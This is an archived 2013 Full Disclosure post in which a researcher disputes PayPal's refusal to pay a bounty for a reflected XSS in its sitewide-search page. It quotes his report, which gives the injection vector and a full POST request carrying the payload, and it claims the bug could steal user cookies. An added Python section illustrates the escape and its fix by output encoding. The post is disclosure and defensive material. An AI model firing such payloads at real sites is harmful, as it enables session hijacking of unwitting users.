Full Disclosure mailing list archives

PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me


From: Shubham Shah <shahshubham369 () gmail com>
Date: Thu, 30 May 2013 00:38:16 +1000

Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same field that Kugler reported, on the same domain of "paypal.com"* - However, I too did not receive a bug bounty. My name is Shubham Shah, also a security researcher, and coincidentally but similarly to Robert Kugler, I too found a cross site scripting vulnerability on PayPal's "sitewide-search" module. My exploit was similar to his; it affected the same parameters, except I had used an alternate vector after fiddling with the search system for some time. The real controversy is, however, that I am *under 18 years old* and I have in the past received money from their program under my older sibling's PayPal account, with permission. When I reported the XSS, pretty much the same as Kugler reported, I was "not eligible for a bounty" because "Another researcher already discovered the bug". Please take a look at the attached emails and screenshots.

Here is what I sent to the Site Security team via their PGP portal:
====================================================

To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/*. This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search".
Affected domains:
https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.

The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can create such a vector.

XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of any HTML or script injection (without the square brackets).

This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if exploited!

Here are some proof-of-concept images:
http://pasteboard.co/2lU54Wuj.png  (PNG file hosted on pasteboard.co) - document.cookie xss on firefox

Here are my personal HTTP headers for making this exploit execute:

POST https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8

Thank you for your time in reading this, Shubham Shah

====================================================

Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message

On 05/13/2013 at 7:47 AM I was told by PayPal that:
====================================================

Hi Shubham,

We regret to inform you that your bug submission was not eligible for a bounty for the following reason. Another researcher already discovered the bug.

Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.

Thank you,
PayPal Security Team

====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print screen of the far right side, I included the barebones print version of the message, so others can verify the date I received the response.

Thanks for reading through.
I actually didn't get anything from PayPal, similar to Robert, but I was able to report the vulnerability 8 days earlier than Robert and still did not receive any acknowledgement. Frankly, I was okay with it and moved on. I do not actually have much against the bounty, as I have been paid numerous times; PayPal has honoured many of my vulnerabilities. However, I can tell you that recently none of my security submissions have been honoured. They state that all my newer submissions have already been reported. I have no actual way of verifying whether they have or not, so I just move on and continue pentesting with spirit.

Also, Robert, I am amazed by your work done with security regarding Mozilla! They were awesome finds! Solid stuff man, I hope one day that I can move onto learning more about application security.
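A defender-side illustration of what the '" prefix in the vector above does (it closes the value attribute the search term is reflected into) and of the output encoding that neutralises it. This is added example code, not part of the original post or of PayPal's search page; the POST body is a constructed excerpt of the request quoted above, and the page template is an assumption.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed excerpt of the form-urlencoded POST body quoted in the post above.
POST_BODY = ("locale_val=en_AU"
             "&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E"
             "&countstr_val=AU&buttonSearch=Search")


def extract_query(body: str) -> str:
    """Decode the search term from the body as the endpoint would (a '+' becomes a space)."""
    return parse_qs(body).get("qrystr_val", [""])[0]


def render_vulnerable(query: str) -> str:
    """Assumed page template that reflects the term verbatim. The leading '" closes the
    value attribute, so the <script> element lands in tag context and is executed."""
    return (f'<input name="qrystr_val" value="{query}">'
            f'<h2>Results for {query}</h2>')


def render_hardened(query: str) -> str:
    """Same template with context-aware encoding. quote=True also encodes ' and ", so the
    term cannot terminate the attribute; < and > are encoded in the text node as well."""
    safe = html.escape(query, quote=True)
    return (f'<input name="qrystr_val" value="{safe}">'
            f'<h2>Results for {safe}</h2>')


def contains_raw_script(markup: str) -> bool:
    """Response-side detection check: does the rendered page contain an unencoded <script tag?"""
    return "<script" in markup.lower()


class TagAudit(HTMLParser):
    """Records which tags a browser-style parser sees and what the input's value decodes to."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def audit(markup: str):
    """Return (tags seen, decoded value attribute); entity decoding is done by the parser."""
    parser = TagAudit()
    parser.feed(markup)
    return parser.tags, parser.input_value
```

With the hardened template the parser sees only the input and the heading, and the value attribute decodes back to the original search term, so the page still works for a user who typed those characters.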
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/